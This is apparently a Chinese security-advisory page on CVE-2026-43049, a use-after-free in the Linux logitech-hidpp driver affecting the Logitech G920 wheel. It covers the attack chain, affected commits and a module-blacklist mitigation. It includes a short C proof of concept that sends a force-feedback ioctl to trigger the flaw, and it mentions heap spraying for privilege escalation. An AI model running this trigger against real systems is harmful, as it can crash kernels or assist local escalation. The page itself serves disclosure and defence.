CVE-2026-43049 CVSS 7.8 高危

CVE-2026-43049 Linux内核logitech-hidpp驱动UAF漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43049

漏洞类型

释放后重用 (UAF)

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel (HID: logitech-hidpp) / Logitech G920方向盘

漏洞概述

Linux内核中的logitech-hidpp驱动程序存在释放后重用（UAF）安全漏洞。该问题主要影响Logitech G920 Xbox One赛车方向盘。当设备探测过程中力反馈初始化失败时，驱动程序仅返回错误代码，却未能正确拆除已注册的用户空间基础设施（如sysfs和/dev/input接口）。如果用户空间进程忽略该错误并继续访问这些已失效的实体，将触发UAF漏洞，可能导致内核崩溃或任意代码执行。

技术细节

该漏洞位于Linux内核的 `drivers/hid/hid-logitech-hidpp.c` 模块中。在设备探测（probe）过程中，若 `hidpp_ff_init` 函数初始化力反馈失败，代码会直接返回错误码。然而，此时 `hid_hw_start` 已经创建了输入设备和sysfs节点，导致这些用户空间接口处于“已注册但未完全初始化”的状态。

由于驱动未在错误路径中调用 `hid_hw_stop` 进行清理， `/dev/input/eventX` 依然可被打开。恶意用户空间程序若无视驱动初始化失败的状态，强制向该设备节点发送IOCTL或读写操作，将触发内核对已释放内存的访问。攻击者可通过堆喷射技术控制该内存内容，从而实现本地提权或导致内核崩溃（DoS）。修复方案是将此错误降级为警告，保留设备基本输入功能。

攻击链分析

STEP 1

1. 物理接入

攻击者需要将受影响的Logitech G920方向盘连接到目标Linux系统。

STEP 2

2. 驱动加载

系统内核加载logitech-hidpp驱动并开始探测设备。

STEP 3

3. 初始化失败

驱动在初始化力反馈功能时失败，返回错误，但未清理已创建的/dev/input节点。

STEP 4

4. 用户空间交互

用户空间程序（可能是恶意软件）无视错误，打开并尝试操作残留的输入设备节点。

STEP 5

5. 触发UAF

内核处理请求时访问已释放的内存，导致系统崩溃或执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <linux/input.h>
#include <string.h>
#include <unistd.h>

// PoC for CVE-2026-43049
// This code attempts to interact with input devices to trigger the UAF
// if the driver failed initialization but left the device node open.

int main() {
    const char *device_path = "/dev/input/event0"; // Typically eventX for G920
    int fd = -1;
    struct input_event ev;

    printf("[+] Attempting to open %s...\n", device_path);
    fd = open(device_path, O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open device");
        return 1;
    }

    printf("[+] Device opened. Attempting to upload effect to trigger UAF...\n");
    
    // Try to upload a force feedback effect. 
    // This requires the device to be in a state where memory might be dangling.
    struct ff_effect effect;
    memset(&effect, 0, sizeof(effect));
    effect.type = FF_RUMBLE;
    effect.id = -1;
    effect.u.rumble.strong_magnitude = 0x8000;
    effect.u.rumble.weak_magnitude = 0x8000;

    if (ioctl(fd, EVIOCSFF, &effect) < 0) {
        perror("[-] IOCTL failed");
    } else {
        printf("[+] IOCTL succeeded. If kernel is vulnerable, UAF may occur now.\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel < Commit 772f99cc8d6e5d95613bce93c9624e154c1abe88

Linux Kernel < Commit 9a793ac19eb84f44ed759c0fce80cf29bc2a2453

Linux Kernel < Commit b846fb0a73e99174f08238e083e284c0463a2102

Linux Kernel < Commit f7a4c78bfeb320299c1b641500fe7761eadbd101

防御指南

临时缓解措施

在没有升级内核的情况下，可以暂时移除Logitech G920设备或通过modprobe.d禁用hid_logitech_hidpp模块以防止驱动加载。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表